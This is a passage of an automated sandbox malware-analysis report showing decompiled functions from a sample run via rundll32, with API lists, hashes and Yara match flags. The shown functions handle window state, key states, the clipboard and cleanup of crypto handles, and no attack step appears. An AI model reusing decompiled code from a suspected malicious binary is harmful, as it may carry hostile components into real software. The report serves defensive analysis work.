                          						_t27 = E0282DE30(E02832A2C(_v8, 0), _t47 | 0xffffffff, 1, _t55, _t62);
                          					}
                          				}
                          				return _t27;
                          			}











                          APIs
                          • IsIconic.USER32(00000000), ref: 0281B31B
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000007,00000000), ref: 0281B345
                          • PostMessageA.USER32(00000000,000000A2,00000002,?), ref: 0281B366
                            • Part of subcall function 0282DE30: GetCursorPos.USER32 ref: 0282DE94
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CursorIconicMessagePostWindow
                          • String ID:
                          • API String ID: 3700078965-0
                          • Opcode ID: 5a773d7c63922b8ef055f25f8013be679797980a333df81054facad69327108b
                          • Instruction ID: 7c0f55684f2defa63b68b9a5607d40f6a13a4763c2c4c062da36cc32d3cf3263
                          • Opcode Fuzzy Hash: 5a773d7c63922b8ef055f25f8013be679797980a333df81054facad69327108b
                          • Instruction Fuzzy Hash: 0C11193CA04208EBDB11EBACD949B9DBBFAAF04314F144194E458EB2A1C730EE509B81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E02819B0C(intOrPtr __eax, intOrPtr __edx) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _t30;
                          				void* _t33;
                          				short _t34;
                          
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				if(GetKeyState(0x12) < 0) {
                          					L12:
                          					_t30 = E028333F8();
                          				} else {
                          					_t33 =  *((intOrPtr*)(_v12 + 4)) - 9;
                          					if(_t33 == 0) {
                          						_t34 = GetKeyState(0x11);
                          						__eflags = _t34;
                          						if(_t34 < 0) {
                          							goto L12;
                          						} else {
                          							__eflags = GetKeyState(0x10);
                          							E02834484( *((intOrPtr*)(_v8 + 0x220)), GetKeyState(0x10), 1);
                          							_t30 = _v12;
                          							 *((intOrPtr*)(_t30 + 0xc)) = 1;
                          						}
                          					} else {
                          						if(_t33 + 0xffffffe4 - 4 < 0) {
                          							_t30 = _v8;
                          							__eflags =  *((intOrPtr*)(_t30 + 0x220));
                          							if( *((intOrPtr*)(_t30 + 0x220)) != 0) {
                          								_push(0);
                          								__eflags =  *((short*)(_v12 + 4)) - 0x27;
                          								if(__eflags != 0) {
                          									__eflags =  *((short*)(_v12 + 4)) - 0x28;
                          									if(__eflags == 0) {
                          										goto L10;
                          									} else {
                          									}
                          								}
                          								E02834484( *((intOrPtr*)(_v8 + 0x220)), __eflags);
                          								_t30 = _v12;
                          								 *((intOrPtr*)(_t30 + 0xc)) = 1;
                          							}
                          						} else {
                          							goto L12;
                          						}
                          					}
                          				}
                          				return _t30;
                          			}









                          APIs
                          • GetKeyState.USER32(00000012), ref: 02819B1A
                          • GetKeyState.USER32(00000011), ref: 02819B45
                          • GetKeyState.USER32(00000010), ref: 02819B53
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: State
                          • String ID:
                          • API String ID: 1649606143-0
                          • Opcode ID: 83b963df34586b64362dadd7a6af4fa97761b13f2c04727c483f8fe9f844c171
                          • Instruction ID: ca2e11dc96886728432e46f36f864866d416ec03c7796fb306a1aee3e2014c29
                          • Opcode Fuzzy Hash: 83b963df34586b64362dadd7a6af4fa97761b13f2c04727c483f8fe9f844c171
                          • Instruction Fuzzy Hash: CD215E3C514218EFDB04DB98D599EDCB7F9AB04768F1481A4E804AB3E2D7719A80DF80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E02818FC0(intOrPtr* __eax, signed int __ecx, intOrPtr __edx) {
                          				intOrPtr* _v8;
                          				intOrPtr _v12;
                          				void* __ebp;
                          				intOrPtr _t28;
                          				signed int _t47;
                          				void* _t56;
                          				void* _t62;
                          
                          				_t47 = __ecx;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				if( *(_v12 + 4) != 2 ||  *((char*)(_v8 + 0x9b)) != 1 || ( *(_v8 + 0x1c) & 0x00000010) != 0 || IsIconic(E02833F7C(_v8)) != 0) {
                          					_t28 = E0282EE58(_v8, _v12);
                          				} else {
                          					SetWindowPos(E02833F7C(_v8), 0, 0, 0, 0, 0, 7);
                          					PostMessageA(E02833F7C(_v8), 0xa2,  *(_v12 + 4),  *(_v12 + 8));
                          					_t28 = _v8;
                          					if( *((char*)(_t28 + 0x22e)) != 0) {
                          						_t28 = E0282DE30(_v8, _t47 | 0xffffffff,  *((intOrPtr*)( *_v8 + 0x54))() ^ 0x00000001, _t56, _t62);
                          					}
                          				}
                          				return _t28;
                          			}











                          APIs
                          • IsIconic.USER32(00000000), ref: 02818FF7
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000007,00000000), ref: 02819015
                          • PostMessageA.USER32(00000000,000000A2,00000002,?), ref: 02819036
                            • Part of subcall function 0282DE30: GetCursorPos.USER32 ref: 0282DE94
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CursorIconicMessagePostWindow
                          • String ID:
                          • API String ID: 3700078965-0
                          • Opcode ID: 74c4f82a9f44f4ef942f3766c6bbe2430632ee34c5350a237484cc1c3887a7aa
                          • Instruction ID: afb5ed0e05ac317b23c89f33f47d39dcfb08ff4b80cc3498726bf2e35e97771c
                          • Opcode Fuzzy Hash: 74c4f82a9f44f4ef942f3766c6bbe2430632ee34c5350a237484cc1c3887a7aa
                          • Instruction Fuzzy Hash: B811EC38E04248EFDB10EBA8D549B9DBBFAAF04710F1441D4E548EB292C771EE80DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E028194AC(intOrPtr* __eax, intOrPtr __edx) {
                          				intOrPtr* _v8;
                          				intOrPtr _v12;
                          				void* _t31;
                          				intOrPtr _t40;
                          
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_t31 =  *((intOrPtr*)(_v12 + 8)) - 1;
                          				if(_t31 == 0) {
                          					if(IsIconic(E02833F7C(_v8)) == 0) {
                          						if(IsZoomed(E02833F7C(_v8)) == 0) {
                          							 *(_v8 + 0x22c) = 1;
                          						} else {
                          							 *(_v8 + 0x22c) = 3;
                          						}
                          					} else {
                          						 *(_v8 + 0x22c) = 2;
                          					}
                          					_t40 =  *((intOrPtr*)( *_v8 - 0x10))();
                          				} else {
                          					if(_t31 == 2) {
                          						_t40 = _v8;
                          						if( *((char*)(_t40 + 0x22c)) != 0) {
                          							ShowWindow(E02833F7C(_v8),  *(0x2863cf0 + ( *(_v8 + 0x22c) & 0x000000ff) * 4));
                          							_t40 = _v8;
                          							 *((char*)(_t40 + 0x22c)) = 0;
                          						}
                          					} else {
                          						_t40 =  *((intOrPtr*)( *_v8 - 0x10))();
                          					}
                          				}
                          				return _t40;
                          			}








                          APIs
                          • IsIconic.USER32(00000000), ref: 028194D4
                          • ShowWindow.USER32(00000000,00000000), ref: 02819545
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: IconicShowWindow
                          • String ID:
                          • API String ID: 3061500023-0
                          • Opcode ID: d0d58af80464386163017bf089067f795f8357ce87336da465dbf1b41714c2ab
                          • Instruction ID: a0af7ab874747587170b50c0f5d6f8fa4e052af39b8274a7450f3a575d624cda
                          • Opcode Fuzzy Hash: d0d58af80464386163017bf089067f795f8357ce87336da465dbf1b41714c2ab
                          • Instruction Fuzzy Hash: 8A21C93C904148EFDB01EBA9D559AADBBF9AF09304F2440E5E808EB292D730EE40DF55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027FB3B4(intOrPtr* __eax, void* __ecx, void* __edx) {
                          				intOrPtr _v68;
                          				intOrPtr _v72;
                          				intOrPtr _v76;
                          				struct tagENHMETAHEADER _v104;
                          				void* __ebp;
                          				intOrPtr _t35;
                          				intOrPtr* _t37;
                          				struct HENHMETAFILE__* _t43;
                          				intOrPtr _t44;
                          
                          				_t37 = __eax;
                          				_t43 = GetClipboardData(0xe);
                          				if(_t43 == 0) {
                          					_t35 =  *0x28645e0; // 0x27f538c
                          					E027F87AC(_t35);
                          				}
                          				E027FAB54(_t37);
                          				_t44 =  *((intOrPtr*)(_t37 + 0x28));
                          				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
                          				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
                          				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
                          				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
                          				 *((short*)(_t44 + 0x18)) = 0;
                          				 *((char*)(_t37 + 0x2c)) = 1;
                          				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
                          				return  *((intOrPtr*)( *_t37 + 0x10))();
                          			}













                          APIs
                          • GetClipboardData.USER32(0000000E), ref: 027FB3C1
                          • CopyEnhMetaFileA.GDI32(00000000,00000000), ref: 027FB3E3
                          • GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000), ref: 027FB3F5
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FileMeta$ClipboardCopyDataHeader
                          • String ID:
                          • API String ID: 1752724394-0
                          • Opcode ID: 1c7913baa901df951d4411b80f452d1d68d0700da7330b5db3f0fe2c47c76d83
                          • Instruction ID: 937ffb76e6c599d673b7622ae64a9c81cc5c787ab12892c377c2ecf8b5018f76
                          • Opcode Fuzzy Hash: 1c7913baa901df951d4411b80f452d1d68d0700da7330b5db3f0fe2c47c76d83
                          • Instruction Fuzzy Hash: 26115B72B003059FCB11DFA9D888A9ABBF9EF49710F104669E918CB351DB71EC05CB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0281CA50() {
                          				struct tagPOINT _v12;
                          				void* _t5;
                          				long _t6;
                          				intOrPtr _t7;
                          				intOrPtr _t12;
                          
                          				 *0x2865b68 = GetCurrentThreadId();
                          				while(1) {
                          					_t5 =  *0x2865b6c; // 0x0
                          					_t6 = WaitForSingleObject(_t5, 0x64);
                          					if(_t6 != 0x102) {
                          						break;
                          					}
                          					if( *0x2865b58 != 0) {
                          						_t7 =  *0x2865b58; // 0x41d1544
                          						if( *((intOrPtr*)(_t7 + 0x60)) != 0) {
                          							GetCursorPos( &_v12);
                          							if(E0282BFA0( &_v12) == 0) {
                          								_t12 =  *0x2865b58; // 0x41d1544
                          								E0281F440(_t12);
                          							}
                          						}
                          					}
                          				}
                          				return _t6;
                          			}









                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 0281CA56
                          • GetCursorPos.USER32(?), ref: 0281CA7A
                          • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 0281CA9D
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CurrentCursorObjectSingleThreadWait
                          • String ID:
                          • API String ID: 1359611202-0
                          • Opcode ID: 69715338c17a08c976bc2157aa20e769221f323f6096567c40346544d3fbb185
                          • Instruction ID: f2affaedfa3032fe300b5821e835261882302a21f126ecd150b99e69119068dc
                          • Opcode Fuzzy Hash: 69715338c17a08c976bc2157aa20e769221f323f6096567c40346544d3fbb185
                          • Instruction Fuzzy Hash: 43F0A7FD98020A9AD717EF68E44FB4833AE9700314F544922E114CB0D0EB35A4F0CE16
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 58%
                          			E042D2D98() {
                          				void* _t17;
                          
                          				if( *(_t17 - 4) != 0) {
                          					__imp__CryptDestroyHash( *(_t17 - 4));
                          					 *(_t17 - 4) = 0;
                          				}
                          				if( *(_t17 - 0xc) != 0) {
                          					CryptDestroyKey( *(_t17 - 0xc));
                          					 *(_t17 - 0xc) = 0;
                          				}
                          				if( *(_t17 - 8) != 0) {
                          					CryptReleaseContext( *(_t17 - 8), 0);
                          					 *(_t17 - 8) = 0;
                          				}
                          				return  *((intOrPtr*)(_t17 - 0x10));
                          			}





                          APIs
                          • CryptDestroyHash.ADVAPI32(00000000), ref: 042D2DAA
                          • CryptDestroyKey.ADVAPI32(00000000), ref: 042D2DC1
                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 042D2DDA
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Destroy$ContextHashRelease
                          • String ID:
                          • API String ID: 3577760690-0
                          • Opcode ID: f3c26a3e5551a8971529073e9ae6ce8e92cb75f6764896ddb80ef3e1f8b5655b
                          • Instruction ID: 65b4530a8f0eb21e72e6ab458331e8a00ea78fc2cbcb889a5d335247c0d22e7d
                          • Opcode Fuzzy Hash: f3c26a3e5551a8971529073e9ae6ce8e92cb75f6764896ddb80ef3e1f8b5655b
                          • Instruction Fuzzy Hash: B1F0AC75E11208EBDF24DF94E54CBADB7B4EB04306F1084C8E516A63C0C7796A84DF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 58%
                          			E042D2D17() {
                          				void* _t17;
                          
                          				if( *(_t17 - 4) != 0) {
                          					__imp__CryptDestroyHash( *(_t17 - 4));
                          					 *(_t17 - 4) = 0;
                          				}
                          				if( *(_t17 - 0xc) != 0) {
                          					CryptDestroyKey( *(_t17 - 0xc));
                          					 *(_t17 - 0xc) = 0;
                          				}
                          				if( *(_t17 - 8) != 0) {
                          					CryptReleaseContext( *(_t17 - 8), 0);
                          					 *(_t17 - 8) = 0;
                          				}
                          				return  *((intOrPtr*)(_t17 - 0x10));
                          			}





                          APIs
                          • CryptDestroyHash.ADVAPI32(00000000), ref: 042D2DAA
                          • CryptDestroyKey.ADVAPI32(00000000), ref: 042D2DC1
                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 042D2DDA
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Destroy$ContextHashRelease
                          • String ID:
                          • API String ID: 3577760690-0
                          • Opcode ID: 5eacb5c61257cda172241222458bc2ab4bf51c2eed2149288c39210c5d551447
                          • Instruction ID: 65b4530a8f0eb21e72e6ab458331e8a00ea78fc2cbcb889a5d335247c0d22e7d
                          • Opcode Fuzzy Hash: 5eacb5c61257cda172241222458bc2ab4bf51c2eed2149288c39210c5d551447
                          • Instruction Fuzzy Hash: B1F0AC75E11208EBDF24DF94E54CBADB7B4EB04306F1084C8E516A63C0C7796A84DF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 58%
                          			E042D2D78() {
                          				void* _t17;
                          
                          				if( *(_t17 - 4) != 0) {
                          					__imp__CryptDestroyHash( *(_t17 - 4));
                          					 *(_t17 - 4) = 0;
                          				}
                          				if( *(_t17 - 0xc) != 0) {
                          					CryptDestroyKey( *(_t17 - 0xc));
                          					 *(_t17 - 0xc) = 0;
                          				}
                          				if( *(_t17 - 8) != 0) {
                          					CryptReleaseContext( *(_t17 - 8), 0);
                          					 *(_t17 - 8) = 0;
                          				}
                          				return  *((intOrPtr*)(_t17 - 0x10));
                          			}





                          APIs
                          • CryptDestroyHash.ADVAPI32(00000000), ref: 042D2DAA
                          • CryptDestroyKey.ADVAPI32(00000000), ref: 042D2DC1
                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 042D2DDA
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Destroy$ContextHashRelease
                          • String ID:
                          • API String ID: 3577760690-0
                          • Opcode ID: 9e541a08fb6e71971091022f9210553309fe9f401893bcbc182454819ce603e7
                          • Instruction ID: 65b4530a8f0eb21e72e6ab458331e8a00ea78fc2cbcb889a5d335247c0d22e7d
                          • Opcode Fuzzy Hash: 9e541a08fb6e71971091022f9210553309fe9f401893bcbc182454819ce603e7
                          • Instruction Fuzzy Hash: B1F0AC75E11208EBDF24DF94E54CBADB7B4EB04306F1084C8E516A63C0C7796A84DF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 58%
                          			E042D2D55() {
                          				void* _t17;
                          
                          				if( *(_t17 - 4) != 0) {
                          					__imp__CryptDestroyHash( *(_t17 - 4));
                          					 *(_t17 - 4) = 0;
                          				}
                          				if( *(_t17 - 0xc) != 0) {
                          					CryptDestroyKey( *(_t17 - 0xc));
                          					 *(_t17 - 0xc) = 0;
                          				}
                          				if( *(_t17 - 8) != 0) {
                          					CryptReleaseContext( *(_t17 - 8), 0);
                          					 *(_t17 - 8) = 0;
                          				}
                          				return  *((intOrPtr*)(_t17 - 0x10));
                          			}





                          APIs
                          • CryptDestroyHash.ADVAPI32(00000000), ref: 042D2DAA
                          • CryptDestroyKey.ADVAPI32(00000000), ref: 042D2DC1
                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 042D2DDA
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Destroy$ContextHashRelease
                          • String ID:
                          • API String ID: 3577760690-0
                          • Opcode ID: 6343a0a666bbbe88b8d8dcebb993f9f882f6bfb6d0217034b5e67a8f26c6708b
                          • Instruction ID: 65b4530a8f0eb21e72e6ab458331e8a00ea78fc2cbcb889a5d335247c0d22e7d
                          • Opcode Fuzzy Hash: 6343a0a666bbbe88b8d8dcebb993f9f882f6bfb6d0217034b5e67a8f26c6708b
                          • Instruction Fuzzy Hash: B1F0AC75E11208EBDF24DF94E54CBADB7B4EB04306F1084C8E516A63C0C7796A84DF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E028330B4(intOrPtr* __eax, intOrPtr __edx) {
                          				intOrPtr _v8;
                          				void* __ecx;
                          				void* _t25;
                          				intOrPtr* _t31;
                          				void* _t34;
                          				intOrPtr* _t37;
                          				void* _t45;
                          
                          				_v8 = __edx;
                          				_t37 = __eax;
                          				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
                          					L8:
                          					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
                          						L10:
                          						return  *((intOrPtr*)( *_t37 - 0x10))();
                          					}
                          					_t25 = E02833004(_t37, _t45);
                          					if(_t25 == 0) {
                          						goto L10;
                          					}
                          				} else {
                          					_t31 =  *0x28645d4; // 0x2865b58
                          					_t9 =  *_t31 + 0x44; // 0x0
                          					if(_t37 ==  *_t9) {
                          						goto L8;
                          					} else {
                          						_t34 = E0281381C(_t37);
                          						_t44 = _t34;
                          						if(_t34 == 0) {
                          							goto L8;
                          						} else {
                          							_t25 = E0282E93C(_t44, 0, 0xb017, _v8);
                          							if(_t25 == 0) {
                          								goto L8;
                          							}
                          						}
                          					}
                          				}
                          				return _t25;
                          			}











                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CaptureIconic
                          • String ID:
                          • API String ID: 2277910766-0
                          • Opcode ID: d14a6912e4b4fa7ad87a5d9be8a777b0efcc7409b40e4ca9e08556841ade9ff9
                          • Instruction ID: 5b8bb59c2b8199fe93bcba647d552edba5f504b46ab285e6839123f19c62898f
                          • Opcode Fuzzy Hash: d14a6912e4b4fa7ad87a5d9be8a777b0efcc7409b40e4ca9e08556841ade9ff9
                          • Instruction Fuzzy Hash: DF113A7EB002059BDB22DB5CD984AADB3F9AF04344B2450A5F528EB251EB34ED409BD4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 66%
                          			E028182CC(int __eax, int* __edx) {
                          				int _v8;
                          				int* _v12;
                          				int _t29;
                          
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				if( *(_v8 + 0x254) == 0) {
                          					_t29 = E02831AF4(_v8, _v12);
                          				} else {
                          					if( *_v12 != 5) {
                          						_t29 = DefFrameProcA(E02833F7C(_v8),  *(_v8 + 0x254),  *_v12, _v12[1], _v12[2]);
                          						_v12[3] = _t29;
                          					} else {
                          						_push(_v12[2]);
                          						_push(_v12[1]);
                          						_push( *_v12);
                          						_t29 = E02833F7C(_v8);
                          						_push(_t29);
                          						L027D6A3C();
                          						_v12[3] = _t29;
                          					}
                          				}
                          				return _t29;
                          			}







                          APIs
                          • NtdllDefWindowProc_A.USER32(00000000,?,?,?), ref: 02818309
                          • DefFrameProcA.USER32(00000000,00000000,?,?,?), ref: 0281833D
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FrameNtdllProcProc_Window
                          • String ID:
                          • API String ID: 3758719113-0
                          • Opcode ID: 6b2f9f32df56627f98f7c04bf588bcdf0eb1e58db3c603e50a0334012dc81695
                          • Instruction ID: d2c782cff42f8335364d647f382eac5d1f487bde683a7bc937e8ee3751142825
                          • Opcode Fuzzy Hash: 6b2f9f32df56627f98f7c04bf588bcdf0eb1e58db3c603e50a0334012dc81695
                          • Instruction Fuzzy Hash: 08114279A04208EFDB40DB9CC985E9DBBF9AB48320F198190E549EB361D730EE80DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 58%
                          			E027F883C(void* __ebx) {
                          				char _v260;
                          				char _v264;
                          				long _t21;
                          				void* _t22;
                          				intOrPtr _t27;
                          				void* _t32;
                          
                          				_v264 = 0;
                          				_push(_t32);
                          				_push(0x27f88d8);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t32 + 0xfffffefc;
                          				_t21 = GetLastError();
                          				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
                          					E027F87E8(_t22);
                          				} else {
                          					E027D4358( &_v264, 0x100,  &_v260);
                          					E027DBBC4(_v264, 1);
                          					E027D3A9C();
                          				}
                          				_pop(_t27);
                          				 *[fs:eax] = _t27;
                          				_push(0x27f88df);
                          				return E027D40E8( &_v264);
                          			}










                          APIs
                          • GetLastError.KERNEL32(00000000,027F88D8), ref: 027F885C
                          • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,027F88D8), ref: 027F8882
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          • Opcode ID: 5a7a30df3cd2b51a6babb44e60a398ef70454d07715362429f90dcf9ed4e5bf5
                          • Instruction ID: ee775fc8b030a4c986050b800b7c53348eef9f437b8c35fff438ea51e123608f
                          • Opcode Fuzzy Hash: 5a7a30df3cd2b51a6babb44e60a398ef70454d07715362429f90dcf9ed4e5bf5
                          • Instruction Fuzzy Hash: A801F7713182095BF752EB64CC92BDA73BEDB48700F8140B1EB44A6380DBB0AD808E26
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E02815EA0(long __eax, intOrPtr __edx) {
                          				long _v8;
                          				intOrPtr _v12;
                          				char* _t12;
                          				long _t15;
                          				long _t19;
                          
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_t12 =  *0x28644d4; // 0x2865b98
                          				if( *_t12 == 0) {
                          					_t15 = IsIconic(E02833F7C(_v8));
                          					if(_t15 != 0) {
                          						_t15 =  *((intOrPtr*)( *_v8 + 0x7c))();
                          					}
                          				} else {
                          					_t15 = E02834254(_v8);
                          					if(_t15 != 0) {
                          						_t15 = _v8;
                          						if( *((char*)(_t15 + 0x229)) != 3) {
                          							_t19 = E02818B60(_v8);
                          							_t15 = SendMessageA(E02833F7C(_v8), 0x80, 1, _t19);
                          						}
                          					}
                          				}
                          				return _t15;
                          			}









                          APIs
                          • SendMessageA.USER32(00000000,00000080,00000001,00000000), ref: 02815EE7
                          • IsIconic.USER32(00000000), ref: 02815EF7
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: IconicMessageSend
                          • String ID:
                          • API String ID: 3972539302-0
                          • Opcode ID: 2b4e3f0885e9eb37a8fc44de7bd93f5683866b9936bff66d8b5a59b6d3828a81
